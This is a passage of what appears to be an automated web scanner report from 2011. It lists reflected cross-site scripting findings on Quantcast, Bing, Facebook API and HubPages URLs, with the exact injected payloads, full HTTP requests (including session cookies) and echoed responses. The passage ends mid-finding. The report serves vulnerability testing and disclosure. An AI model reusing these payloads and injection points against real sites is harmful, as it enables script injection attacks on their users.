Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:42 GMT
Connection: close
Content-Length: 17796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" b02eb"><a>05e13fd73f3 themes quantcast images sociable_rss.gif" />
...[SNIP]...

1.78. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_twitter.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_twitter.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb10b"><a>71c775aa3d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bb10b"><a>71c775aa3d7/themes/quantcast/images/sociable_twitter.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:42 GMT
Connection: close
Content-Length: 17822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" bb10b"><a>71c775aa3d7 themes quantcast images sociable_twitter.gif" />
...[SNIP]...

1.79. http://ak.quantcast.com/wp-content/themes/quantcast/images/sociable_youtube.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ak.quantcast.com
Path:	/wp-content/themes/quantcast/images/sociable_youtube.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32d6"><a>2260ad9ff5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a32d6"><a>2260ad9ff5d/themes/quantcast/images/sociable_youtube.gif?jcb=1288361934 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://ak.quantcast.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297445179.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=14861494.2106100296.1296313950.1297444254.1297445284.4; __utma=27727020.780724242.1297445179.1297445179.1297445179.1; __utmb=27727020.23.8.1297446426489; qcVisitor=2|97|1297445121784|16|NOTSET

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 18:13:41 GMT
Connection: close
Content-Length: 17823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" a32d6"><a>2260ad9ff5d themes quantcast images sociable_youtube.gif" />
...[SNIP]...

1.80. http://api.bing.com/qsonhs.aspx [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bing.com
Path:	/qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 1850d<img%20src%3da%20onerror%3dalert(1)>5684ef00da5 was submitted in the q parameter. This input was echoed as 1850d<img src=a onerror=alert(1)>5684ef00da5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?form=MSN005&q=1850d<img%20src%3da%20onerror%3dalert(1)>5684ef00da5 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHUID=V=2&GUID=5F6DCD22B1A0431C9BC12CA254340213; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: f82fe03e8a6e4fcb85a67fe126410648
Date: Fri, 11 Feb 2011 18:31:19 GMT
Connection: close

{"AS":{"Query":"1850d<img src=a onerror=alert(1)>5684ef00da5","FullResults":1}}

1.81. http://api.facebook.com/restserver.php [method parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7 was submitted in the method parameter. This input was echoed as 5381e<img src=a onerror=alert(1)>9d6042fa9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats5381e<img%20src%3da%20onerror%3dalert(1)>9d6042fa9f7&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:20 GMT
Content-Length: 360

fb_sharepro_render({"error_code":3,"error_msg":"Unknown method","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats5381e<img src=a onerror=alert(1)>9d6042fa9f7"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.82. http://api.facebook.com/restserver.php [urls parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9 was submitted in the urls parameter. This input was echoed as 8585e<img src=a onerror=alert(1)>f213777d1e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.quantcast.com%2Fcraigslist.org%3Fcountry%3DUS%22%5D8585e<img%20src%3da%20onerror%3dalert(1)>f213777d1e9&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/craigslist.org?country=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwiki.answers.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwiki.answers.com%252FQ%252FWhy_are_pro_forma_financial_statements_important_to_the_financial_planning_process%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Fri, 11 Feb 2011 10:17:39 -0800
Pragma:
X-Cnection: close
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Length: 376

fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/www.quantcast.com\/craigslist.org?country=US\"]8585e<img src=a onerror=alert(1)>f213777d1e9"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});

1.83. http://hubpages.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548f8"><script>alert(1)</script>9a7d90ba46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?548f8"><script>alert(1)</script>9a7d90ba46e=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/?548f8"><script>alert(1)</script>9a7d90ba46e=1', 'HubPages'); return false;">
...[SNIP]...

1.84. http://hubpages.com/about/advertise [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/about/advertise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23253"><script>alert(1)</script>b500e541fe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about23253"><script>alert(1)</script>b500e541fe8/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about23253"><script>alert(1)</script>b500e541fe8/advertise', 'Page not found'); return false;">
...[SNIP]...

1.85. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/about/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c6c"><script>alert(1)</script>7545254ff79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1', 'Advertise on HubPages'); return false;">
...[SNIP]...

1.86. http://hubpages.com/hubs/hot/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/hubs/hot/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8bd"><script>alert(1)</script>8ae6a13056a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad8bd"><script>alert(1)</script>8ae6a13056a/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:40 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/ad8bd"><script>alert(1)</script>8ae6a13056a/hot/', 'Page not found'); return false;">
...[SNIP]...

1.87. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/hubs/hot/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd29"><script>alert(1)</script>a7b16cce6e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Hot Hubs" href="http://hubpages.com/hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1&rss" />
...[SNIP]...

1.88. http://hubpages.com/my/hubs/stats [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/my/hubs/stats

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42fda"><script>alert(1)</script>dcab9466b78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats', 'Page not found'); return false;">
...[SNIP]...

1.89. http://hubpages.com/my/hubs/stats [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/my/hubs/stats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bf69"><script>alert(1)</script>92d7c54b2f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats', 'Page not found'); return false;">
...[SNIP]...

1.90. http://hubpages.com/my/hubs/stats [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/my/hubs/stats

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 277b5"><script>alert(1)</script>f325d2bc4d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:28 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8', 'Page not found'); return false;">
...[SNIP]...

1.91. http://hubpages.com/signin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>e576f82391c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

1.92. http://hubpages.com/topics/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/topics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f48"><script>alert(1)</script>a4d9d607aff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

